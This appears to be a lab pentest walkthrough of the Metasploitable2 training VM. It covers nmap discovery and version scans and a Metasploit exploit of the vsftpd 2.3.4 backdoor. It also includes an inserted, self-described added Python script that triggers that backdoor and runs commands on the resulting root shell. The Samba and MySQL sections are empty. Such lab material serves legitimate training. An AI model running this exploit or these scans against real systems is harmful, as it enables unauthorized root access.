Metasploitable2 target machine pentest
This post was last updated 420 days ago; the information in it may have moved on or changed since.

Introduction

Metasploitable2 is a deliberately vulnerable Linux VM built for Metasploit demonstrations: it exposes a large number of high-risk ports and ships with several high-severity, publicly known vulnerabilities.

Download

https://pan.baidu.com/s/1shixJeI1Ca4D0WpI5GUV8w?pwd=sfk5
The download is an archive; extract it and open the VM in VMware.
Default credentials: msfadmin/msfadmin
Run sudo passwd root to set a password for the root account.


Prerequisites

  • The Metasploitable2 VM is booted
  • Metasploit (here on a Kali VM on the same VMware network)

Host discovery

nmap -sP 192.168.225.0/24

-sP is the legacy spelling of -sn: a ping sweep that lists live hosts without scanning ports.

┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.225.0/24 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-17 03:02 EDT
Nmap scan report for localhost (192.168.225.1)
Host is up (0.0048s latency).
Nmap scan report for localhost (192.168.225.2)
Host is up (0.0039s latency).
Nmap scan report for localhost (192.168.225.128)
Host is up (0.00069s latency).
Nmap scan report for localhost (192.168.225.139)
Host is up (0.0012s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.45 seconds

The Kali box is .128, so the target must be .139.

Port discovery

nmap -sT 192.168.225.139

A TCP connect scan. Without -p, nmap scans its default list of the 1000 most common ports, which is why the output below accounts for 23 open plus 977 closed ports.

┌──(kali㉿kali)-[~]
└─$ nmap -sT 192.168.225.139 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-17 03:06 EDT
Nmap scan report for localhost (192.168.225.139)
Host is up (0.30s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.17 seconds

Port 21 (FTP) exploitation

Version scan

nmap -sV -p 1-65535 192.168.225.139

Scanning all 65535 ports with service detection is slow (162 seconds here against about one second for the default scan), but it pays off: it turns up seven ports the top-1000 scan missed, including distccd on 3632 and Ruby DRb on 8787, each a foothold in its own right.

┌──(kali㉿kali)-[~]
└─$ nmap -sV -p 1-65535 192.168.225.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-17 03:08 EDT
Nmap scan report for localhost (192.168.225.139)
Host is up (0.0023s latency).
Not shown: 65505 closed tcp ports (conn-refused)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  shell?
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13?
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42536/tcp open  nlockmgr    1-4 (RPC #100021)
42763/tcp open  status      1 (RPC #100024)
43178/tcp open  mountd      1-3 (RPC #100005)
45304/tcp open  java-rmi    GNU Classpath grmiregistry
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.93%I=7%D=10/17%Time=652E3305%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2B,"\x01Host\x20address\x20mismatch\x20for\x20192\.168\.225\.128\n");
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.44 seconds

Looking up n-day vulnerabilities

CVE database: https://cve.mitre.org/cgi-bin/cvekey.cgi
Search keyword: vsftpd 2.3.4

The search gives us these keywords:

  • vsftpd
  • CVE-2011-2523
  • CVE-2011-0762
In msfconsole, search for these keywords (search vsftpd, or search CVE-2011-2523) to see whether Metasploit has a module for them.

The search returns one module: exploit/unix/ftp/vsftpd_234_backdoor. (CVE-2011-0762 is a separate vsftpd denial-of-service issue and has no matching module here.)

Exploitation

use 0 selects module number 0 from the search results
show options lists the module's parameters
set rhosts 192.168.225.139 points RHOSTS at the target
run launches the exploit

  • First attempt failed: Exploit completed, but no session was created

show options to double-check the parameters

  • Nothing wrong with the configuration

run again

  • Second attempt succeeded. This flakiness is common with this module: the backdoor in vsftpd 2.3.4 is triggered by a username containing ":)", after which the vsftpd child handling that session binds TCP port 6200 and blocks waiting for a connection instead of answering the FTP client; the module then connects to 6200 and hands you /bin/sh. If the first run triggers the backdoor but fails to pick up the session, the listener is often still waiting, so simply re-running the module connects to it.

whoami shows the current user is root

ifconfig shows the machine's IP is now the target, .139
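The same exploitation step done by hand, as an added example that is neither this page's code nor Metasploit's vsftpd_234_backdoor module: trigger_backdoor sends the ":)" username and a password exactly like the module does, and run_command connects to port 6200 and runs one command, retrying a refused connection a few times to absorb the race observed above. fake_vsftpd is a constructed stand-in for the trojaned daemon so the whole thing can be exercised offline: it listens on ephemeral ports (the real backdoor always uses 6200) and answers id with a canned root line rather than executing anything. All function names are this example's own.

```python
#!/usr/bin/env python3
"""Trigger the vsftpd 2.3.4 backdoor (CVE-2011-2523) by hand.

Added example: not this page's code and not Metasploit's module. The trojaned
daemon checks the USER argument for the bytes ":)" (0x3a 0x29); if found, the
child serving that session binds TCP 6200, blocks in accept() without ever
answering the client, and execs /bin/sh on the first connection. fake_vsftpd()
is a constructed stand-in for offline testing only (ephemeral ports, canned
output instead of running anything). All function names are this example's own.
"""
import socket
import threading
import time

BACKDOOR_PORT = 6200


def trigger_backdoor(host, ftp_port=21, timeout=5.0):
    """Send USER with ':)' then a PASS (as the msf module does); return the
    banner. No 331 is expected: a triggered child is already in accept()."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        s.sendall(b"USER msf:)\r\n")
        s.settimeout(1.0)
        try:
            s.recv(1024)              # real 2.3.4 never replies once triggered
        except socket.timeout:
            pass
        try:
            s.sendall(b"PASS whatever\r\n")
        except OSError:
            pass
    return banner


def run_command(host, cmd, shell_port=BACKDOOR_PORT, attempts=5, delay=1.0):
    """Connect to the spawned shell, run one command and return its output.
    A refused connect is retried (the listener appears asynchronously); after
    `attempts` failures a RuntimeError is raised, i.e. the page's first run."""
    last_err = None
    for _ in range(attempts):
        try:
            s = socket.create_connection((host, shell_port), timeout=5.0)
        except OSError as e:          # ECONNREFUSED: no shell (yet) on the port
            last_err = e
            time.sleep(delay)
            continue
        with s:
            s.sendall(cmd.encode() + b"\n")
            s.settimeout(2.0)         # /bin/sh keeps the socket open; stop on idle
            chunks = []
            try:
                while (data := s.recv(4096)):
                    chunks.append(data)
            except socket.timeout:
                pass
        return b"".join(chunks).decode(errors="replace").strip()
    raise RuntimeError(f"no backdoor shell on {host}:{shell_port}: {last_err}")


def free_port(host="127.0.0.1"):
    """Pick a currently unused TCP port (test helper)."""
    with socket.socket() as tmp:
        tmp.bind((host, 0))
        return tmp.getsockname()[1]


def fake_vsftpd(host="127.0.0.1"):
    """Constructed stand-in for the backdoored daemon. Returns (ftp_port,
    shell_port); the shell port is bound only after the ':)' trigger, so an
    early connect is refused just as it is against the real daemon."""
    ftp = socket.socket()
    ftp.bind((host, 0))
    ftp.listen(1)
    shell_port = free_port(host)

    def serve():
        conn, _ = ftp.accept()
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        buf, triggered = b"", False
        while not triggered:                        # normal FTP command loop
            data = conn.recv(1024)
            if not data:
                conn.close()
                return
            buf += data
            while b"\r\n" in buf and not triggered:
                line, buf = buf.split(b"\r\n", 1)
                if line.upper().startswith(b"USER"):
                    if b":)" in line:               # the backdoor check
                        triggered = True            # stop replying, go "listen"
                    else:
                        conn.sendall(b"331 Please specify the password.\r\n")
                elif line.upper().startswith(b"PASS"):
                    conn.sendall(b"530 Login incorrect.\r\n")
        shell = socket.socket()
        shell.bind((host, shell_port))
        shell.listen(1)
        sh, _ = shell.accept()                      # stands in for execl("/bin/sh")
        canned = {b"id": b"uid=0(root) gid=0(root) groups=0(root)\n", b"whoami": b"root\n"}
        with sh, sh.makefile("rb") as f:
            for raw in f:
                cmd = raw.strip()
                sh.sendall(canned.get(cmd, b"sh: " + cmd + b": not found\n"))
        for sock in (conn, shell, ftp):
            sock.close()

    threading.Thread(target=serve, daemon=True).start()
    return ftp.getsockname()[1], shell_port


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.225.139"
    print(trigger_backdoor(target))
    print(run_command(target, "id"))
```

Against the lab target, python3 vsftpd_backdoor.py 192.168.225.139 prints the FTP banner and then the output of id from the root shell on port 6200. The retry loop in run_command is the only thing that separates this from the flaky first run above: when 6200 is not listening yet the connect is refused and tried again, and only after all attempts fail is the equivalent of "no session was created" raised.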

Port 139 (Samba) exploitation

Port 3306 (MySQL) exploitation

The sea of learning is boundless; turn back and the shore is there. --- hola